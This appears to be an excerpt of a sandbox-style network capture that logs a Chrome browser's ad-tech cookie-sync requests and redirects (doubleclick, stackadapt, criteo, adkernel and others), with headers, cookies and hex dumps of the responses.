2024-10-31 18:19:34 UTC	1466	IN	HTTP/1.1 302 Found p3p: policyref="/bh/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Bitness,Sec-CH-UA-Mobile,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Platform-Version cw-server: bh-deployment-fc986c88d-2x9cw cache-control: private, max-age=0, no-cache, no-store expires: -1 content-language: en-US set-cookie: V=cUA7hh0a77Vk;Version=0;Secure;Path=/;Domain=.contextweb.com;Expires=Sun, 26-Oct-2025 18:19:34 GMT;Max-Age=31104000;SameSite=None set-cookie: VP=part_cUA7hh0a77Vk;Version=0;Path=/;Domain=.contextweb.com;Max-Age=31104000;Secure;Expires=Sun, 26-Oct-2025 18:19:34 GMT;SameSite=None;Partitioned set-cookie: pb_rtb_ev=3-1uid\|7Bj.0.CAESEC6PH-lvJoYH9V_-6nwhMus;Version=0;Secure;Path=/;Domain=.contextweb.com;Expires=Fri, 31-Oct-2025 18:19:34 GMT;Max-Age=31536000;SameSite=None set-cookie: pb_rtb_ev_part=3-1uid\|7Bj.0.CAESEC6PH-lvJoYH9V_-6nwhMus;Version=0;Path=/;Domain=.contextweb.com;Max-Age=31536000;Secure;Expires=Fri, 31-Oct-2025 18:19:34 GMT;SameSite=None;Partitioned location: https://cm.g.doubleclick.net/pixel?google_nid=pulsepoint_inc_&google_push=AXcoOmQHW3Senmpk8tpcaDaCAkasoYHxB1QL3vzrRn4MuUN_wlYAkuh8f5ngrgzRfD_4zBEpSvzZMxzLE6FJ02A6qXPBh-8n3s0ad4A9&google_hm=Y1VBN2hoMGE3N1Zr transfer-encoding: chunked server: Jetty(10.0.14) set-cookie: INGRESSCOOKIE=5940b0e95f9f660c; path=/; HttpOnly; Secure; SameSite=None connection: close
2024-10-31 18:19:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49857	185.98.54.153	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:34 UTC	809	OUT	GET /match/47/?remote_uid=CAESEA_YaeSFRZgNp7ugVZyanQk&c_param1=AXcoOmQJjBajovnqSJhcnjB8OznNBMIfG7StGCCKjvywNcFSn6R5uJC5Ake0ACufry6wJvOvysfECv7eIsLmnMa4auWPPgivRfRT0PA&gdpr=%%GDPR%%&addtl_consent=%%ADDTL_CONSENT%%&google_cver=1 HTTP/1.1 Host: s.uuidksinc.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:34 UTC	432	IN	HTTP/1.1 302 Found Server: nginx/1.23.2 Date: Thu, 31 Oct 2024 18:19:34 GMT Content-Length: 0 Connection: close Location: https://cm.g.doubleclick.net/pixel?google_nid=kadam&google_push=AXcoOmQJjBajovnqSJhcnjB8OznNBMIfG7StGCCKjvywNcFSn6R5uJC5Ake0ACufry6wJvOvysfECv7eIsLmnMa4auWPPgivRfRT0PA Set-Cookie: jcsuuid=MiXMLVme0oV7RCZ5G9dN; expires=Fri, 31 Oct 2025 18:19:34 GMT; domain=uuidksinc.net; path=/; secure; SameSite=None

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49869	54.88.211.52	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:34 UTC	776	OUT	GET /sync?nid=154&google_gid=CAESEHWbVka7PFDHpdWk2787PTM&google_cver=1&google_push=AXcoOmRyI8F21-Wg9-ClV_GMcSKS-JEdK8e0hNkNpUxrM_9_KTEJg_mGuqLEG93DCe1MxNcb1YG8zgga00vYgS2qswEdwz2nZ6Ibdw HTTP/1.1 Host: sync.srv.stackadapt.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:34 UTC	1439	IN	HTTP/1.1 302 Found Content-Type: text/html; charset=utf-8 Date: Thu, 31 Oct 2024 18:19:34 GMT Location: https://cm.g.doubleclick.net/pixel?google_nid=stackadapt_usd&google_hm=_yhf8n8vXnl46QBoNdb48K3--k0&google_push=AXcoOmRyI8F21-Wg9-ClV_GMcSKS-JEdK8e0hNkNpUxrM_9_KTEJg_mGuqLEG93DCe1MxNcb1YG8zgga00vYgS2qswEdwz2nZ6Ibdw Set-Cookie: sa-user-id=s%3A0-ff285ff2-7f2f-5e79-78e9-006835d6f8f0.QAA9z3ChocJip1uIYIa8sGT2GThByHSABZeam5cHJZc; Max-Age=31536000; Secure; SameSite=None Set-Cookie: sa-user-id=s%3A0-ff285ff2-7f2f-5e79-78e9-006835d6f8f0.QAA9z3ChocJip1uIYIa8sGT2GThByHSABZeam5cHJZc; Domain=srv.stackadapt.com; Max-Age=31536000; Secure; SameSite=None Set-Cookie: sa-user-id-v2=s%3A_yhf8n8vXnl46QBoNdb48K3--k0.VfWqpluOJZNZwG%2BLbA1nVM5LauD2ikq2JE%2Fx6LBhsvg; Max-Age=31536000; Secure; SameSite=None Set-Cookie: sa-user-id-v2=s%3A_yhf8n8vXnl46QBoNdb48K3--k0.VfWqpluOJZNZwG%2BLbA1nVM5LauD2ikq2JE%2Fx6LBhsvg; Domain=srv.stackadapt.com; Max-Age=31536000; Secure; SameSite=None Set-Cookie: sa-user-id-v3=s%3AAQAKIAl_UMXlLVq1gPDeubUSST63S4qKpsG52-egPFa0fK9AEHwYBCC2lI-5BjABOgT87-jmQgQyb9xk.y4TibvAkV3R6LKOBLJBhIEqD8bPb1GV1ZUP5Rp5Noxg; Max-Age=31536000; Secure; SameSite=None Set-Cookie: sa-user-id-v3=s%3AAQAKIAl_UMXlLVq1gPDeubUSST63S4qKpsG52-egPFa0fK9AEHwYBCC2lI-5BjABOgT87-jmQgQyb9xk.y4TibvAkV3R6LKOBLJBhIEqD8bPb1GV1ZUP5Rp5Noxg; Domain=srv.stackadapt.com; Max-Age=31536000; Secure; SameSite=None Content-Length: 244 Connection: Close
2024-10-31 18:19:34 UTC	244	IN	Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6d 2e 67 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 70 69 78 65 6c 3f 67 6f 6f 67 6c 65 5f 6e 69 64 3d 73 74 61 63 6b 61 64 61 70 74 5f 75 73 64 26 61 6d 70 3b 67 6f 6f 67 6c 65 5f 68 6d 3d 5f 79 68 66 38 6e 38 76 58 6e 6c 34 36 51 42 6f 4e 64 62 34 38 4b 33 2d 2d 6b 30 26 61 6d 70 3b 67 6f 6f 67 6c 65 5f 70 75 73 68 3d 41 58 63 6f 4f 6d 52 79 49 38 46 32 31 2d 57 67 39 2d 43 6c 56 5f 47 4d 63 53 4b 53 2d 4a 45 64 4b 38 65 30 68 4e 6b 4e 70 55 78 72 4d 5f 39 5f 4b 54 45 4a 67 5f 6d 47 75 71 4c 45 47 39 33 44 43 65 31 4d 78 4e 63 62 31 59 47 38 7a 67 67 61 30 30 76 59 67 53 32 71 73 77 45 64 77 7a 32 6e 5a 36 49 62 64 77 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href="https://cm.g.doubleclick.net/pixel?google_nid=stackadapt_usd&google_hm=_yhf8n8vXnl46QBoNdb48K3--k0&google_push=AXcoOmRyI8F21-Wg9-ClV_GMcSKS-JEdK8e0hNkNpUxrM_9_KTEJg_mGuqLEG93DCe1MxNcb1YG8zgga00vYgS2qswEdwz2nZ6Ibdw">Found</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49855	35.204.158.49	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:34 UTC	762	OUT	GET /gp_match?google_gid=CAESEEQQDa5m7sjciSE7Ndvm-Qs&google_cver=1&google_push=AXcoOmSIhx_awINzXgzYWs7Ldkdetu8Y-SBwDodzM3mFTtUbrbhkp0OS6hSo2f96raiQfkDC1lzy9png7PoLVky3HNMKBXYnTJqxnD8 HTTP/1.1 Host: um.simpli.fi Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:35 UTC	1034	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 31 Oct 2024 18:19:34 GMT Content-Type: text/html Content-Length: 142 Connection: close Set-Cookie: suid=39F8AD7435EC43369D67DAA35699A1F7; Path=/; domain=simpli.fi; Expires=Sat, 01-Nov-25 18:19:34 GMT; SameSite=none; Secure; Set-Cookie: suid_legacy=39F8AD7435EC43369D67DAA35699A1F7; Path=/; domain=simpli.fi; Expires=Sat, 01-Nov-25 18:19:34 GMT; Secure; Location: https://cm.g.doubleclick.net/pixel?google_nid=simplifi&google_hm=39F8AD7435EC43369D67DAA35699A1F7&google_push=AXcoOmSIhx_awINzXgzYWs7Ldkdetu8Y-SBwDodzM3mFTtUbrbhkp0OS6hSo2f96raiQfkDC1lzy9png7PoLVky3HNMKBXYnTJqxnD8 Expires: Wed, 30 Oct 2024 18:19:34 GMT Cache-Control: no-cache Strict-Transport-Security: max-age=63072000; includeSubdomains; preload X-Content-Type-Options: nosniff Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Allow-Headers: DNT,X-Mx-ReqToken,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type
2024-10-31 18:19:35 UTC	142	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49868	54.170.20.205	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:34 UTC	772	OUT	GET /cookie-sync/adx?google_gid=CAESENLpOVFDHsC-VfNLaLRul-w&google_cver=1&google_push=AXcoOmRCFB4RRBFgylxbOFqFBPjZeDvCs7GKRvkfHQCCMWA8xyYRxGIyqTtHvnHsOhTFPNWwGBpagrnbCD1tYp2Fb3NXZOXDekx5 HTTP/1.1 Host: match.prod.bidr.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:35 UTC	534	IN	HTTP/1.1 303 See Other Date: Thu, 31 Oct 2024 18:19:35 GMT location: https://match.prod.bidr.io/cookie-sync/adx?google_gid=CAESENLpOVFDHsC-VfNLaLRul-w&google_cver=1&google_push=AXcoOmRCFB4RRBFgylxbOFqFBPjZeDvCs7GKRvkfHQCCMWA8xyYRxGIyqTtHvnHsOhTFPNWwGBpagrnbCD1tYp2Fb3NXZOXDekx5&_bee_ppp=1 Server: gunicorn set-cookie: checkForPermission=ok; Domain=bidr.io; expires=Thu, 31 Oct 2024 18:29:35 GMT; Path=/; SameSite=None; Secure strict-transport-security: max-age=2592000; includeSubDomains Content-Length: 0 Connection: Close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49882	54.88.211.52	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:35 UTC	778	OUT	GET /sync?nid=154&google_gid=CAESEOhl-PvFg9cy4oKnILke398&google_cver=1&google_push=AXcoOmRtdCb-MvIoLYG0BLsM4ImCpoRrxKqAbDTAIJV5X2WKmBHF96QTkDLW4_9rU_cVAa9PlVl7JS_w5IFmJvCMk_9EQJFv2n-HLvp_ HTTP/1.1 Host: sync.srv.stackadapt.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:35 UTC	1449	IN	HTTP/1.1 302 Found Content-Type: text/html; charset=utf-8 Date: Thu, 31 Oct 2024 18:19:35 GMT Location: https://cm.g.doubleclick.net/pixel?google_nid=stackadapt_usd&google_hm=_yhf8n8vXnl46QBoNdb48K3--k0&google_push=AXcoOmRtdCb-MvIoLYG0BLsM4ImCpoRrxKqAbDTAIJV5X2WKmBHF96QTkDLW4_9rU_cVAa9PlVl7JS_w5IFmJvCMk_9EQJFv2n-HLvp_ Set-Cookie: sa-user-id=s%3A0-ff285ff2-7f2f-5e79-78e9-006835d6f8f0.QAA9z3ChocJip1uIYIa8sGT2GThByHSABZeam5cHJZc; Max-Age=31536000; Secure; SameSite=None Set-Cookie: sa-user-id=s%3A0-ff285ff2-7f2f-5e79-78e9-006835d6f8f0.QAA9z3ChocJip1uIYIa8sGT2GThByHSABZeam5cHJZc; Domain=srv.stackadapt.com; Max-Age=31536000; Secure; SameSite=None Set-Cookie: sa-user-id-v2=s%3A_yhf8n8vXnl46QBoNdb48K3--k0.VfWqpluOJZNZwG%2BLbA1nVM5LauD2ikq2JE%2Fx6LBhsvg; Max-Age=31536000; Secure; SameSite=None Set-Cookie: sa-user-id-v2=s%3A_yhf8n8vXnl46QBoNdb48K3--k0.VfWqpluOJZNZwG%2BLbA1nVM5LauD2ikq2JE%2Fx6LBhsvg; Domain=srv.stackadapt.com; Max-Age=31536000; Secure; SameSite=None Set-Cookie: sa-user-id-v3=s%3AAQAKIAl_UMXlLVq1gPDeubUSST63S4qKpsG52-egPFa0fK9AEHwYBCC3lI-5BjABOgT87-jmQgRtA-Bs.zcykn1TgoqQWGnGECt3%2FG7%2BIt8vHDNo0wSWyrwyqUqY; Max-Age=31536000; Secure; SameSite=None Set-Cookie: sa-user-id-v3=s%3AAQAKIAl_UMXlLVq1gPDeubUSST63S4qKpsG52-egPFa0fK9AEHwYBCC3lI-5BjABOgT87-jmQgRtA-Bs.zcykn1TgoqQWGnGECt3%2FG7%2BIt8vHDNo0wSWyrwyqUqY; Domain=srv.stackadapt.com; Max-Age=31536000; Secure; SameSite=None Content-Length: 246 Connection: Close
2024-10-31 18:19:35 UTC	246	IN	Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6d 2e 67 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 70 69 78 65 6c 3f 67 6f 6f 67 6c 65 5f 6e 69 64 3d 73 74 61 63 6b 61 64 61 70 74 5f 75 73 64 26 61 6d 70 3b 67 6f 6f 67 6c 65 5f 68 6d 3d 5f 79 68 66 38 6e 38 76 58 6e 6c 34 36 51 42 6f 4e 64 62 34 38 4b 33 2d 2d 6b 30 26 61 6d 70 3b 67 6f 6f 67 6c 65 5f 70 75 73 68 3d 41 58 63 6f 4f 6d 52 74 64 43 62 2d 4d 76 49 6f 4c 59 47 30 42 4c 73 4d 34 49 6d 43 70 6f 52 72 78 4b 71 41 62 44 54 41 49 4a 56 35 58 32 57 4b 6d 42 48 46 39 36 51 54 6b 44 4c 57 34 5f 39 72 55 5f 63 56 41 61 39 50 6c 56 6c 37 4a 53 5f 77 35 49 46 6d 4a 76 43 4d 6b 5f 39 45 51 4a 46 76 32 6e 2d 48 4c 76 70 5f 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href="https://cm.g.doubleclick.net/pixel?google_nid=stackadapt_usd&google_hm=_yhf8n8vXnl46QBoNdb48K3--k0&google_push=AXcoOmRtdCb-MvIoLYG0BLsM4ImCpoRrxKqAbDTAIJV5X2WKmBHF96QTkDLW4_9rU_cVAa9PlVl7JS_w5IFmJvCMk_9EQJFv2n-HLvp_">Found</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49877	172.217.18.4	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:35 UTC	798	OUT	GET /pagead/drt/ui HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://googleads.g.doubleclick.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:35 UTC	426	IN	HTTP/1.1 302 Found Timing-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Location: https://googleads.g.doubleclick.net/pagead/drt/si?st=NO_DATA Cache-Control: private Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Thu, 31 Oct 2024 18:19:35 GMT Server: cafe Content-Length: 0 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49876	172.217.18.4	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:35 UTC	804	OUT	GET /ads/measurement/l?ebcid=ALh7CaR80l8t9U7n9gXPOfu3w6UyLAl3cik-0i5KBcl3_ssI2Gtx2spmIdHhFx9UzfMiFWCsz14vmro9J-xO4PKboOMcIXp8MA HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://googleads.g.doubleclick.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:35 UTC	314	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Thu, 31 Oct 2024 18:19:35 GMT Server: jumble_frontend_server Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49900	8.2.111.136	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:35 UTC	827	OUT	GET /sync?id=10&google_gid=CAESEMDhonF9Btdu1XWfNJz5fhA&google_cver=1&google_push=AXcoOmSVgF44yqfpd96VbFVh_KjAPRPC4Ai_8ZtMMIn9azfRglCI6xaLv6qNovrTM_6iJz8pWP9tCIBnejjHjsYUA-2q3qq8sZJAfaeuHw HTTP/1.1 Host: sync2-dsp.e-volution.ai Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: production=42792e3cde3b100032f83ab40466
2024-10-31 18:19:35 UTC	410	IN	HTTP/1.1 302 Found Set-Cookie: production=42792e3cde3b100032f83ab40466; HttpOnly; SameSite=None; Secure; Expires=Wed Jan 29 2025 18:19:35 GMT+0000 (Coordinated Universal Time); Max-Age=7776000; path=/; domain=.e-volution.ai; Location: https://cm.g.doubleclick.net/pixel?google_nid=309242622&google_hm=42792e3cde3b100032f83ab40466 Date: Thu, 31 Oct 2024 18:19:35 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49884	20.157.217.118	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:35 UTC	773	OUT	GET /api/adx/cm/pixel?google_gid=CAESENYT61gwLXGsOhmLZBLf7tE&google_cver=1&google_push=AXcoOmSwaAEJs2KOmCEYVvFDTykRMfzP5EgxESu2Kp_CNP1qYCwsJSzte81WmXDP9HOJ6CmStE9CMEmJ5PqfvDw16JSgB3T_dmeec4Dc4Q HTTP/1.1 Host: www.temu.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:35 UTC	770	IN	HTTP/1.1 302 Server: nginx Date: Thu, 31 Oct 2024 18:19:35 GMT Content-Length: 0 Connection: close Location: https://cm.g.doubleclick.net/pixel?google_nid=whaleco_services_llc&google_push=AXcoOmSwaAEJs2KOmCEYVvFDTykRMfzP5EgxESu2Kp_CNP1qYCwsJSzte81WmXDP9HOJ6CmStE9CMEmJ5PqfvDw16JSgB3T_dmeec4Dc4Q Content-Language: en-US x-gateway-request-id: 1730398775722-2cd38e3003f9524655c08044ca4f6111 strict-transport-security: max-age=31536000 content-security-policy-report-only: default-src 'none';script-src 'report-sample';report-uri /api/sec-csp/110000007/sec-gif yak-timeinfo: 1730398775722\|3 Set-Cookie: api_uid=Cm3EDmcjyjcQBQBVqfixAg==; expires=Fri, 31-Oct-25 18:19:35 GMT; domain=.temu.com; path=/; secure cip: 173.254.250.77 Alt-Svc: h3=":443"; ma=604800

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49883	174.137.133.49	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:35 UTC	825	OUT	GET /sync?exchange=11&google_gid=CAESEBNhaeuSmOpsq07SBs2IyhE&google_cver=1&google_push=AXcoOmTePKwToHaeIQGu8M56gWDzY-1geiWnlUHfQIpsbYld60Ki_rzZaP9OaIWvTKZwgr332ljGgxcxDcFPggPWRaGld0nzhuAzAeO9 HTTP/1.1 Host: dsp.adkernel.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: ADK_EX_11=1; ADKUID=A8836978867793438466
2024-10-31 18:19:35 UTC	539	IN	HTTP/1.1 302 Found Server: nginx Date: Thu, 31 Oct 2024 18:19:35 GMT Content-Length: 0 Connection: close Set-Cookie: ADK_EX_11=1; Max-Age=1209600; Domain=.adkernel.com; Path=/; Secure; SameSite=None Set-Cookie: ADKUID=A8836978867793438466; Max-Age=2592000; Domain=.adkernel.com; Path=/; Secure; SameSite=None Location: https://cm.g.doubleclick.net/pixel?google_nid=adkernel&google_hm=QTg4MzY5Nzg4Njc3OTM0Mzg0NjY&google_push=AXcoOmTePKwToHaeIQGu8M56gWDzY-1geiWnlUHfQIpsbYld60Ki_rzZaP9OaIWvTKZwgr332ljGgxcxDcFPggPWRaGld0nzhuAzAeO9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49890	178.250.1.9	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:35 UTC	908	OUT	GET /dis/usersync.aspx?r=4&p=14&cp=google&cu=1&url=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dcjp%26google_hm%3D%40%40CRITEO_USERID%40%40%26google_push%3DAXcoOmQ1NvIkBuiezRP4VyO1tot_Yk-dOVvINUBM4mZHt7YSmwC9oik7a2vt6010qe8UdTECB7DIt_PBPnp2mLudoQCl_f0ZmP97TYXp&google_gid=CAESEBG-T-imfgN0jPbZ2bYvkgg&google_cver=1 HTTP/1.1 Host: dis.criteo.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
